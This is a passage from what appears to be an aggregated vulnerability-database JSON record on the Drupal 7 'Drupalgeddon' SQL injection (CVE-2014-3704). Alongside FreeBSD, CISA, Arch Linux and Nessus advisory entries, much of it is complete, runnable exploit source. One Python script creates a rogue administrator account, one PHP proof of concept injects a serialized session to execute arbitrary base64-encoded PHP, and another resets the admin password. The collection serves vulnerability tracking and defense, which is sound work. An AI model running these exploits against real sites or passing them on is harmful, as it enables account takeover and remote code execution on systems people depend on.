3):\r\n# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)\r\n#\r\npost_data = \"name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27\"+user+\"%27,+%27\"+hash[:55]+\"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27\"+user+\"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\"\r\n\r\nUA = randomAgentGen()\r\ntry:\r\n req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })\r\n content = urllib2.urlopen(req).read()\r\n\r\n if \"mb_strlen() expects parameter 1\" in content:\r\n print \"[!] VULNERABLE!\"\r\n print\r\n\tprint \"[!] Administrator user created!\"\r\n\tprint\r\n print \"[*] Login: \"+str(user)\r\n print \"[*] Pass: \"+str(password)\r\n print \"[*] Url: \"+str(target)\r\n\r\n else:\r\n print \"[X] NOT Vulnerable :(\"\r\n\r\nexcept urllib2.HTTPError as e:\r\n\r\n print \"[X] HTTP Error: \"+str(e.reason)+\" (\"+str(e.code)+\")\"\r\n\r\nexcept urllib2.URLError as e:\r\n\r\n print \"[X] Connection error: \"+str(e.reason)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34992/"}, {"lastseen": "2016-02-04T00:43:15", "description": "Drupal < 7.32 Pre Auth SQL Injection. CVE-2014-3704. Webapps exploit for php platform", "published": "2014-11-03T00:00:00", "type": "exploitdb", "title": "Drupal < 7.32 Pre Auth SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-03T00:00:00", "id": "EDB-ID:35150", "href": "https://www.exploit-db.com/exploits/35150/", "sourceData": "<?php\r\n// _____ __ __ _ _______\r\n// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____\r\n// \\__ \\/ _ \\/ //_/ __/ / __ \\/ __ \\/ __/ / / __ \\/ ___/\r\n// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )\r\n// /____/\\___/_/|_|\\__/_/\\____/_/ /_/_____/_/_/ /_/____/\r\n// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins\r\n//\r\n// created by Stefan Horst <stefan.horst@sektioneins.de>\r\n// and Stefan Esser <stefan.esser@sektioneins.de>\r\n//\u00c2\u02c7\r\n\r\ninclude 'common.inc';\r\ninclude 'password.inc';\r\n\r\n// set values\r\n$user_id = 0;\r\n$user_name = '';\r\n\r\n$code_inject = 'phpinfo();session_destroy();die(\"\");';\r\n\r\n$url = isset($argv[1])?$argv[1]:'';\r\n$code = isset($argv[2])?$argv[2]:'';\r\n\r\nif ($url == '-h') {\r\n echo \"usage:\\n\";\r\n echo $argv[0].' $url [$code|$file]'.\"\\n\";\r\n die();\r\n}\r\n\r\nif (empty($url) || strpos($url,'https') === False) {\r\n echo \"please state the cookie url. It works only with https urls.\\n\";\r\n die();\r\n}\r\n\r\nif (!empty($code)) {\r\n if (is_file($code)) {\r\n $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));\r\n } else {\r\n $code_inject = $code;\r\n }\r\n}\r\n\r\n$code_inject = rtrim($code_inject,';');\r\n$code_inject .= ';session_destroy();die(\"\");';\r\n\r\nif (strpos($url, 'www.') === 0) {\r\n $url = substr($url, 4);\r\n}\r\n\r\n$_SESSION= array('a'=>'eval(base64_decode(\"'.base64_encode($code_inject).'\"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');\r\n$_SESSION['build_info']['args'][0] = &$_SESSION['string'];\r\n\r\nlist( , $session_name) = explode('://', $url, 2);\r\n\r\n// use insecure cookie with sql inj.\r\n$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);\r\n$password = user_hash_password('test');\r\n\r\n$session_id = drupal_random_key();\r\n$sec_ssid = drupal_random_key();\r\n\r\n$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',\"batch_form_state|\".serialize($_SESSION)));\r\n$inject = \"UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('\".$serial.\"','CURLYCLOSE',CHAR(\".ord('}').\")),'CURLYOPEN',CHAR(\".ord('{').\")) -- \";\r\n\r\n$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;\r\n\r\n$ch = curl_init($url);\r\n\r\ncurl_setopt($ch,CURLOPT_HEADER,True);\r\ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,True);\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);\r\ncurl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');\r\n\r\ncurl_setopt($ch,CURLOPT_HTTPHEADER,array(\r\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language: en-US,en;q=0.5'\r\n));\r\n\r\ncurl_setopt($ch,CURLOPT_COOKIE,$cookie);\r\n\r\n$output = curl_exec($ch);\r\n\r\ncurl_close($ch);\r\n\r\necho $output;", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35150/"}], "freebsd": [{"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "\nDrupal Security Team reports:\n\nDrupal 7 includes a database abstraction API to ensure that\n\t queries executed against the database are sanitized to prevent\n\t SQL injection attacks.\n\t A vulnerability in this API allows an attacker to send\n\t specially crafted requests resulting in arbitrary SQL execution.\n\t Depending on the content of the requests this can lead to\n\t privilege escalation, arbitrary PHP execution, or other attacks.\n\t This vulnerability can be exploited by anonymous users.\n\n", "edition": 4, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "6F825FA4-5560-11E4-A4C3-00A0986F28C4", "href": "https://vuxml.freebsd.org/freebsd/6f825fa4-5560-11e4-a4c3-00a0986f28c4.html", "title": "drupal7 -- SQL injection", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2020-12-18T18:07:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-3704"], "description": "Drupal has released a security advisory to address an application program interface (API) vulnerability ([CVE-2014-3704](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704>)) that could allow an attacker to execute arbitrary SQL commands on an affected system.\n\nThis vulnerability affects all Drupal core 7.x versions prior to 7.32.\n\nUS-CERT advises users and administrators review [Drupal's Security Advisory](<https://www.drupal.org/SA-CORE-2014-005>) and apply the necessary update or patch.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2014/10/17/Drupal-Releases-Security-Advisory>); we'd welcome your feedback.\n", "modified": "2014-10-17T00:00:00", "published": "2014-10-17T00:00:00", "id": "CISA:FFCDB9DA7615256969EE472D5D78DB00", "href": "https://us-cert.cisa.gov/ncas/current-activity/2014/10/17/Drupal-Releases-Security-Advisory", "type": "cisa", "title": "Drupal Releases Security Advisory", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.0 7.31 - Drupalgeddon SQL Injection (PoC) (Reset Password) (2)", "edition": 1, "published": "2014-10-17T00:00:00", "title": "Drupal 7.0 7.31 - Drupalgeddon SQL Injection (PoC) (Reset Password) (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "EXPLOITPACK:6AE05C0C36F87EB49C39A4038C324777", "href": "", "sourceData": "<?php\n#-----------------------------------------------------------------------------#\n# Exploit Title: Drupal core 7.x - SQL Injection #\n# Date: Oct 16 2014 #\n# Exploit Author: Dustin D\u00f6rr #\n# Software Link: http://www.drupal.com/ #\n# Version: Drupal core 7.x versions prior to 7.32 #\n# CVE: CVE-2014-3704 #\n#-----------------------------------------------------------------------------#\n\n$url = 'http://www.example.com';\n$post_data = \"name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'\" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . \"'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\";\n\n$params = array(\n'http' => array(\n'method' => 'POST',\n'header' => \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n'content' => $post_data\n)\n);\n$ctx = stream_context_create($params);\n$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);\n\nif(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {\necho \"Success! Log in with username \\\"admin\\\" and password \\\"admin\\\" at {$url}user/login\";\n} else {\necho \"Error! Either the website isn't vulnerable, or your Internet isn't working. \";\n}\n?>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.0 7.31 - Drupalgeddon SQL Injection (Add Admin User)", "edition": 1, "published": "2014-10-17T00:00:00", "title": "Drupal 7.0 7.31 - Drupalgeddon SQL Injection (Add Admin User)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "EXPLOITPACK:84DF4AE744B6A7D61BCB8FD28AC4BC73", "href": "", "sourceData": "#!/usr/bin/python\n#\n# \n# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005\n# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)\n#\n# Tested on Drupal 7.31 with BackBox 3.x\n#\n# This material is intended for educational \n# purposes only and the author can not be held liable for \n# any kind of damages done whatsoever to your machine, \n# or damages caused by some other,creative application of this material.\n# In any case you disagree with the above statement,stop here.\n\nimport hashlib, urllib2, optparse, random, sys\n\n# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\n# Calculate a non-truncated Drupal 7 compatible password hash.\n# The consumer of these hashes must truncate correctly.\n\nclass DrupalHash:\n\n def __init__(self, stored_hash, password):\n self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\n self.last_hash = self.rehash(stored_hash, password)\n\n def get_hash(self):\n return self.last_hash\n\n def password_get_count_log2(self, setting):\n return self.itoa64.index(setting[3])\n\n def password_crypt(self, algo, password, setting):\n setting = setting[0:12]\n if setting[0] != '$' or setting[2] != '$':\n return False\n\n count_log2 = self.password_get_count_log2(setting)\n salt = setting[4:12]\n if len(salt) < 8:\n return False\n count = 1 << count_log2\n\n if algo == 'md5':\n hash_func = hashlib.md5\n elif algo == 'sha512':\n hash_func = hashlib.sha512\n else:\n return False\n hash_str = hash_func(salt + password).digest()\n for c in range(count):\n hash_str = hash_func(hash_str + password).digest()\n output = setting + self.custom64(hash_str)\n return output\n\n def custom64(self, string, count = 0):\n if count == 0:\n count = len(string)\n output = ''\n i = 0\n itoa64 = self.itoa64\n while 1:\n value = ord(string[i])\n i += 1\n output += itoa64[value & 0x3f]\n if i < count:\n value |= ord(string[i]) << 8\n output += itoa64[(value >> 6) & 0x3f]\n if i >= count:\n break\n i += 1\n if i < count:\n value |= ord(string[i]) << 16\n output += itoa64[(value >> 12) & 0x3f]\n if i >= count:\n break\n i += 1\n output += itoa64[(value >> 18) & 0x3f]\n if i >= count:\n break\n return output\n\n def rehash(self, stored_hash, password):\n # Drupal 6 compatibility\n if len(stored_hash) == 32 and stored_hash.find('$') == -1:\n return hashlib.md5(password).hexdigest()\n # Drupal 7\n if stored_hash[0:2] == 'U$':\n stored_hash = stored_hash[1:]\n password = hashlib.md5(password).hexdigest()\n hash_type = stored_hash[0:3]\n if hash_type == '$S$':\n hash_str = self.password_crypt('sha512', password, stored_hash)\n elif hash_type == '$H$' or hash_type == '$P$':\n hash_str = self.password_crypt('md5', password, stored_hash)\n else:\n hash_str = False\n return hash_str\n# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\n\ndef randomAgentGen():\n\n userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\n 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\n 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',\n 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',\n 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',\n 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',\n 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\n 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']\n\n UA = random.choice(userAgent)\n return UA\n\n\ndef urldrupal(url):\n if url[:8] != \"https://\" and url[:7] != \"http://\":\n print('[X] You must insert http:// or https:// procotol')\n sys.exit(1)\n # Page login\n url = url+'/?q=node&destination=node'\n return url\n\n\nbanner = \"\"\"\n ______ __ _______ _______ _____ \n | _ \\ .----.--.--.-----.---.-| | | _ || _ | _ | \n |. | \\| _| | | _ | _ | | |___| _|___| |.| | \n |. | |__| |_____| __|___._|__| / |___(__ `-|. | \n |: 1 / |__| | | |: 1 | |: | \n |::.. . / | | |::.. . | |::.| \n `------' `---' `-------' `---' \n _______ __ ___ __ __ __ \n | _ .-----| | | .-----|__.-----.----| |_|__.-----.-----.\n | 1___| _ | | |. | | | -__| __| _| | _ | |\n |____ |__ |__| |. |__|__| |_____|____|____|__|_____|__|__|\n |: 1 | |__| |: | |___| \n |::.. . | |::.| \n `-------' `---' \n \n Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n\n Admin 4cc0unt cr3at0r\n\n\t\t\t Discovered by:\n\n\t\t\t Stefan Horst\n (CVE-2014-3704)\n\n Written by:\n\n Claudio Viviani\n\n http://www.homelab.it\n\n info@homelab.it\n homelabit@protonmail.ch\n\n https://www.facebook.com/homelabit\n https://twitter.com/homelabit\n https://plus.google.com/+HomelabIt1/\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\n\n\"\"\"\n\ncommandList = optparse.OptionParser('usage: %prog -t http[s]://TARGET_URL -u USER -p PASS\\n')\ncommandList.add_option('-t', '--target',\n action=\"store\",\n help=\"Insert URL: http[s]://www.victim.com\",\n )\ncommandList.add_option('-u', '--username',\n action=\"store\",\n help=\"Insert username\",\n )\ncommandList.add_option('-p', '--pwd',\n action=\"store\",\n help=\"Insert password\",\n )\noptions, remainder = commandList.parse_args()\n\n# Check args\nif not options.target or not options.username or not options.pwd:\n print(banner)\n print\n commandList.print_help()\n sys.exit(1)\n\nprint(banner)\n\nhost = options.target\nuser = options.username\npassword = options.pwd\n\nhash = DrupalHash(\"$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML\", password).get_hash()\n\ntarget = urldrupal(host)\n\n\n# Add new user:\n# insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'admin', '$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld' FROM users\n#\n# Set administrator permission (rid = 3):\n# insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'admin'), 3)\n#\npost_data = \"name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,+MAX(uid)%2B1,+%27\"+user+\"%27,+%27\"+hash[:55]+\"%27+FROM+users;insert+into+users_roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+%27\"+user+\"%27),+3);;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in\"\n\nUA = randomAgentGen()\ntry:\n req = urllib2.Request(target, post_data, headers={ 'User-Agent': UA })\n content = urllib2.urlopen(req).read()\n\n if \"mb_strlen() expects parameter 1\" in content:\n print \"[!] VULNERABLE!\"\n print\n\tprint \"[!] Administrator user created!\"\n\tprint\n print \"[*] Login: \"+str(user)\n print \"[*] Pass: \"+str(password)\n print \"[*] Url: \"+str(target)\n\n else:\n print \"[X] NOT Vulnerable :(\"\n\nexcept urllib2.HTTPError as e:\n\n print \"[X] HTTP Error: \"+str(e.reason)+\" (\"+str(e.code)+\")\"\n\nexcept urllib2.URLError as e:\n\n print \"[X] Connection error: \"+str(e.reason)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "description": "SQL Injection vulnerabilty in the core SQL module of Drupal\n\nVulnerability Type: SQL Injection", "modified": "2015-04-22T00:00:00", "published": "2015-04-22T00:00:00", "id": "E-446", "href": "", "type": "dsquare", "title": "Drupal core 7.x SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:43", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3704"], "description": "Drupal 7 includes a database abstraction API to ensure that queries\nexecuted against the database are sanitized to prevent SQL injection\nattacks.\nA vulnerability in this API allows an attacker to send specially crafted\nrequests resulting in arbitrary SQL execution. Depending on the content\nof the requests this can lead to privilege escalation, arbitrary PHP\nexecution, or other attacks.\nThis vulnerability can be exploited by anonymous users.\n\nThis vulnerability has been marketed as drupageddon by the discoverer,\nSektion Eins.", "modified": "2014-10-16T00:00:00", "published": "2014-10-16T00:00:00", "id": "ASA-201410-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000118.html", "type": "archlinux", "title": "drupal: pre-auth sql injection", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T01:57:22", "description": "The remote web server is running a version of Drupal that is 7.x prior\nto 7.32. It is, therefore, potentially affected by a SQL injection\nvulnerability due to a flaw in the Drupal database abstraction API,\nwhich allows a remote attacker to use specially crafted requests that\ncan result in arbitrary SQL execution. This may lead to privilege\nescalation, arbitrary PHP execution, or remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 28, "published": "2014-10-16T00:00:00", "title": "Drupal 7.x < 7.32 SQLi", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_7_32.NASL", "href": "https://www.tenable.com/plugins/nessus/78511", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78511);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-3704\");\n script_bugtraq_id(70595);\n script_xref(name:\"EDB-ID\", value:\"34984\");\n script_xref(name:\"EDB-ID\", value:\"34992\");\n script_xref(name:\"EDB-ID\", value:\"34993\");\n script_xref(name:\"EDB-ID\", value:\"35150\");\n\n script_name(english:\"Drupal 7.x < 7.32 SQLi\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\na SQL injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is 7.x prior\nto 7.32. It is, therefore, potentially affected by a SQL injection\nvulnerability due to a flaw in the Drupal database abstraction API,\nwhich allows a remote attacker to use specially crafted requests that\ncan result in arbitrary SQL execution. This may lead to privilege\nescalation, arbitrary PHP execution, or remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2014-005\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.32\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 7.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal core 7.x SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal HTTP Parameter Key/Value SQL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\nurl = build_url(qs:dir, port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nif (version =~ \"^7\\.([0-9]|[1-2][0-9]|3[0-1])($|[^0-9]+)\")\n{\n fix = '7.32';\n\n set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:45:28", "description": "Drupal Security Team reports :\n\nDrupal 7 includes a database abstraction API to ensure that queries\nexecuted against the database are sanitized to prevent SQL injection\nattacks. A vulnerability in this API allows an attacker to send\nspecially crafted requests resulting in arbitrary SQL execution.\nDepending on the content of the requests this can lead to privilege\nescalation, arbitrary PHP execution, or other attacks. This\nvulnerability can be exploited by anonymous users.", "edition": 25, "published": "2014-10-17T00:00:00", "title": "FreeBSD : drupal7 -- SQL injection (6f825fa4-5560-11e4-a4c3-00a0986f28c4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:drupal7"], "id": "FREEBSD_PKG_6F825FA4556011E4A4C300A0986F28C4.NASL", "href": "https://www.tenable.com/plugins/nessus/78521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# 